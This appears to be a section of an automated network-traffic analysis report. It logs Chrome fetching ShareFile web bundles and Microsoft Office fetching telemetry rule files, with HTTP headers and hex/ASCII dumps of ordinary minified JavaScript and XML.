                                                                                                                                                                                                                                                                                Data Ascii: ry(e,n,t[n]);else{if("string"!=typeof t)throw new TypeError("URI.setQuery() accepts an object, string as the name parameter");e[t]=r===undefined?null:r}},i.removeQuery=function(e,t,r){var n,o,s;if(l(t))for(n=0,o=t.length;n<o;n++)e[t[n]]=undefined;else if(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC14368INData Raw: 29 3a 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 66 7d 7d 72 65 74 75 72 6e 20 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 65 7d 2c 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 48 6f 73 74 6e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3d 21 21 74 2c 6f 3d 21 31 3b 69 66 28 21 21 72 26 26 28 6f 3d 64 28 69 2e 68 6f 73 74 50 72 6f 74 6f 63 6f 6c 73 2c 72 29 29 2c 6f 26 26 21 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 48 6f 73 74 6e 61 6d 65 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 2c 20 69 66 20 70 72 6f 74 6f 63 6f 6c 20 69 73 20 22 2b 72 29 3b 69 66 28 74 26 26 74 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 7b 69 66 28 21 65 29 74 68 72 6f 77
                                                                                                                                                                                                                                                                                Data Ascii: ):n.lastIndex=f}}return n.lastIndex=0,e},i.ensureValidHostname=function(t,r){var n=!!t,o=!1;if(!!r&&(o=d(i.hostProtocols,r)),o&&!n)throw new TypeError("Hostname cannot be empty, if protocol is "+r);if(t&&t.match(i.invalid_hostname_characters)){if(!e)throw


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                63192.168.2.64979413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC578OUTGET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Sep 2024 12:33:19 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 d8eef512ab23f23f549b4cd25ac5328c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: _eLhoV19_MSM52d34IPleTps8423UX6XSK1Qoyoq6BYe7anmRJVyag==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                64192.168.2.64979313.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC601OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1199131
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 12:55:38 GMT
                                                                                                                                                                                                                                                                                ETag: "5330d2180773e126082327cde098052b"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 1ac3fd533bf6be1b511077f8b8e23bfc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Fx0IwZERzIYloQXwVs1_R_9C_-VPcwGRhmrhS3HfJlE_Kluh5qgOOA==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15772INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 73 6f 75 72 63 65 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},o={},s={};return Object.defineProperty(i,"__esModule",{
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 6c 6f 77 46 75 6c 6c 53 63 72 65 65 6e 7c 61 6c 6c 6f 77 54 72 61 6e 73 70 61 72 65 6e 63 79 7c 61 6c 74 7c 61 73 79 6e 63 7c 61 75 74 6f 43 6f 6d 70 6c 65 74 65 7c 61 75 74 6f 50 6c 61 79 7c 63 61 70 74 75 72 65 7c 63 65 6c 6c 50 61 64 64 69 6e 67 7c 63 65 6c 6c 53 70 61 63 69 6e 67 7c 63 68 61 6c 6c 65 6e 67 65 7c 63 68 61 72 53 65 74 7c 63 68 65 63 6b 65 64 7c 63 69 74 65 7c 63 6c 61 73 73 49 44 7c 63 6c 61 73 73 4e 61 6d 65 7c 63 6f 6c 73 7c 63 6f 6c 53 70 61 6e 7c 63 6f 6e 74 65 6e 74 7c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7c 63 6f 6e 74 65 78 74 4d 65 6e 75 7c 63 6f 6e 74 72 6f 6c 73 7c 63 6f 6e 74 72 6f 6c 73 4c 69 73 74 7c 63 6f 6f 72 64 73 7c 63 72 6f 73 73 4f 72 69 67 69 6e 7c 64 61 74 61 7c 64 61 74 65 54 69 6d 65 7c 64 65 63 6f 64 69
                                                                                                                                                                                                                                                                                Data Ascii: lowFullScreen|allowTransparency|alt|async|autoComplete|autoPlay|capture|cellPadding|cellSpacing|challenge|charSet|checked|cite|classID|className|cols|colSpan|content|contentEditable|contextMenu|controls|controlsList|coords|crossOrigin|data|dateTime|decodi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 3d 3d 69 3b 29 6e 2e 70 75 73 68 28 72 29 2c 68 2e 74 65 73 74 28 65 2e 63 68 61 72 41 74 28 4d 29 29 3f 28 72 3d 65 2e 63 68 61 72 41 74 28 4d 29 2c 4d 2b 2b 29 3a 28 72 3d 69 2c 30 3d 3d 3d 45 26 26 43 28 76 29 29 3b 65 6c 73 65 20 6e 3d 69 3b 72 65 74 75 72 6e 20 6e 21 3d 3d 69 26 26 28 4c 3d 74 2c 6e 3d 77 28 29 29 2c 74 3d 6e 7d 69 66 28 28 72 3d 73 28 29 29 21 3d 3d 69 26 26 4d 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 72 3b 74 68 72 6f 77 20 72 21 3d 3d 69 26 26 4d 3c 65 2e 6c 65 6e 67 74 68 26 26 43 28 7b 74 79 70 65 3a 22 65 6e 64 22 7d 29 2c 49 28 44 2c 59 3c 65 2e 6c 65 6e 67 74 68 3f 65 2e 63 68 61 72 41 74 28 59 29 3a 6e 75 6c 6c 2c 59 3c 65 2e 6c 65 6e 67 74 68 3f 6a 28 59 2c 59 2b 31 29 3a 6a 28 59 2c 59 29 29 7d 7d 7d 2c 35
                                                                                                                                                                                                                                                                                Data Ascii: ==i;)n.push(r),h.test(e.charAt(M))?(r=e.charAt(M),M++):(r=i,0===E&&C(v));else n=i;return n!==i&&(L=t,n=w()),t=n}if((r=s())!==i&&M===e.length)return r;throw r!==i&&M<e.length&&C({type:"end"}),I(D,Y<e.length?e.charAt(Y):null,Y<e.length?j(Y,Y+1):j(Y,Y))}}},5
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15420INData Raw: 73 3d 6e 75 6c 6c 2c 63 3d 6e 75 6c 6c 2c 6c 3d 21 31 2c 75 3d 21 31 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3d 65 2e 74 72 69 6d 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 21 31 3b 69 66 28 77 5b 65 5d 29 65 3d 77 5b 65 5d 2c 74 3d 21 30 3b 65 6c 73 65 20 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 65 29 72 65 74 75 72 6e 7b 72 3a 30 2c 67 3a 30 2c 62 3a 30 2c 61 3a 30 2c 66 6f 72 6d 61 74 3a 22 6e 61 6d 65 22 7d 3b 76 61 72 20 6e 3d 44 2e 72 67 62 2e 65 78 65 63 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 7b 72 3a 6e 5b 31 5d 2c 67 3a 6e 5b 32 5d 2c 62
                                                                                                                                                                                                                                                                                Data Ascii: s=null,c=null,l=!1,u=!1;return"string"==typeof e&&(e=function(e){if(e=e.trim().toLowerCase(),0===e.length)return!1;var t=!1;if(w[e])e=w[e],t=!0;else if("transparent"===e)return{r:0,g:0,b:0,a:0,format:"name"};var n=D.rgb.exec(e);if(n)return{r:n[1],g:n[2],b
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC422INData Raw: 6e 74 28 22 73 76 67 22 2c 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 22 31 65 6d 22 2c 68 65 69 67 68 74 3a 22 31 65 6d 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 37 2e 39 39 20 32 68 38 2e 30 32 4c 32 32 20 37 2e 39 39 76 38 2e 30 32 4c 31 36 2e 30 31 20 32 32 48 37 2e 39 39 4c 32 20 31 36 2e 30 31 56 37 2e 39 39 7a 6d 33 2e 32 37 20 31 31 2e 38 35 32 56 36 2e 34 34 34 68 31 2e 34 38 76 37
                                                                                                                                                                                                                                                                                Data Ascii: nt("svg",{xmlns:"http://www.w3.org/2000/svg",width:"1em",height:"1em",fill:"currentColor",viewBox:"0 0 24 24"},r.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M7.99 2h8.02L22 7.99v8.02L16.01 22H7.99L2 16.01V7.99zm3.27 11.852V6.444h1.48v7
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 65 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 64 65 66 61 75 6c 74 22 21 3d 3d 6e 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 72 2e 67 65 74 3f 72 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65
                                                                                                                                                                                                                                                                                Data Ascii: {"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 2e 74 2c 66 61 69 6c 75 72 65 43 6f 75 6e 74 3a 74 2e 66 61 69 6c 75 72 65 43 6f 75 6e 74 2b 31 7d 3b 63 61 73 65 22 70 61 75 73 65 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 69 73 50 61 75 73 65 64 3a 21 30 7d 3b 63 61 73 65 22 63 6f 6e 74 69 6e 75 65 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 69 73 50 61 75 73 65 64 3a 21 31 7d 3b 63 61 73 65 22 6c 6f 61 64 69 6e 67 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 63 6f 6e 74 65 78 74 3a 65 2e 63 6f 6e 74 65 78 74 2c 64 61 74 61 3a 76 6f 69 64 20 30 2c 65 72 72 6f 72 3a 6e 75 6c 6c 2c 69 73 50 61 75 73 65 64 3a 21 6a 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6e 65 74 77 6f 72 6b 4d 6f 64 65 29 2c 73 74 61 74 75 73 3a 22 6c 6f 61 64 69 6e 67 22 2c 76 61 72 69 61 62 6c 65 73 3a 65 2e 76 61 72 69 61 62 6c 65 73 7d
                                                                                                                                                                                                                                                                                Data Ascii: .t,failureCount:t.failureCount+1};case"pause":return{...t,isPaused:!0};case"continue":return{...t,isPaused:!1};case"loading":return{...t,context:e.context,data:void 0,error:null,isPaused:!j(this.options.networkMode),status:"loading",variables:e.variables}
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74 65 78 74 29 3b 65 6c 73 65 20 69 66 28 65 2e 6f 6e 45 72 72 6f 72 29 7b 76 61 72 20 61 2c 6f 2c 73 2c 63 3b 6e 75 6c 6c 3d 3d 28 61 3d 28 6f 3d 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 45 72 72 6f 72 29 7c 7c 61 2e 63 61 6c 6c 28 6f 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 65 72 72 6f 72 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74 65 78 74 29 2c 6e 75 6c 6c 3d 3d 28 73 3d 28 63 3d 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 53 65 74 74 6c 65 64 29 7c 7c 73 2e 63 61 6c 6c 28 63 2c 76 6f 69 64 20 30 2c 74 68 69 73 2e
                                                                                                                                                                                                                                                                                Data Ascii: is.currentResult.context);else if(e.onError){var a,o,s,c;null==(a=(o=this.mutateOptions).onError)||a.call(o,this.currentResult.error,this.currentResult.variables,this.currentResult.context),null==(s=(c=this.mutateOptions).onSettled)||s.call(c,void 0,this.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC14808INData Raw: 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2e 70 75 73 68 28 65 2e 66 75 6c 66 69 6c 6c 65 64 2c 65 2e 72 65 6a 65 63 74 65 64 29 7d 29 29 2c 21 69 29 7b 76 61 72 20 64 3d 5b 6f 2c 75 6e 64 65 66 69 6e 65 64 5d 3b 66 6f 72 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 73 68 69 66 74 2e 61 70 70 6c 79 28 64 2c 72 29 2c 64 3d 64 2e 63 6f 6e 63 61 74 28 63 29 2c 61 3d 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 74 29 3b 64 2e 6c 65 6e 67 74 68 3b 29 61 3d 61 2e 74 68 65 6e 28 64 2e 73 68 69 66 74 28 29 2c 64 2e 73 68 69 66 74 28 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 6f 72 28 76 61 72 20 6d 3d 74 3b 72 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 72 2e 73 68 69 66 74 28 29 2c 66 3d 72 2e 73 68 69 66 74 28 29 3b 74 72 79 7b
                                                                                                                                                                                                                                                                                Data Ascii: rEach((function(e){c.push(e.fulfilled,e.rejected)})),!i){var d=[o,undefined];for(Array.prototype.unshift.apply(d,r),d=d.concat(c),a=Promise.resolve(t);d.length;)a=a.then(d.shift(),d.shift());return a}for(var m=t;r.length;){var h=r.shift(),f=r.shift();try{
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC1576INData Raw: 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 74 28 65 29 7d 65 2e 65 78 70 6f 72 74 73 3d 73 2c 65 2e 65 78 70 6f 72 74 73 5b 22 64 65 66 61 75 6c 74 22 5d 3d 73 3b 76 61 72 20 6e 3d 7b 76 61 6c 69 64 61 74 65 3a 61 7d 2c 72 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5b 61 2d 7a 41 2d 5a 5f 5d 5c 5c 77 2a 24 22 2c 22 75 22 29 2c 69 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5b 61 2d 7a 30 2d 39 5f 5d 2b 3a 5b 61 2d 7a 30 2d 39 5f 5d 2b 24 22 2c 22 75 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f
                                                                                                                                                                                                                                                                                Data Ascii: ===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t(e)}e.exports=s,e.exports["default"]=s;var n={validate:a},r=new RegExp("^[a-zA-Z_]\\w*$","u"),i=new RegExp("^[a-z0-9_]+:[a-z0-9_]+$","u");function a(e){var o=arguments.length>1&&arguments[1]!==undefined?


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                65192.168.2.64978913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                x-ms-request-id: 14c2f8e7-301e-0000-27cc-19eecc000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bdqh8w7ruf4kwucmw000000014000000000fp42
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                66192.168.2.64979213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                x-ms-request-id: 38c0e901-901e-0016-3f33-1aefe9000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bdqh8w7ruf4kwucmw0000000110000000010xcb
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
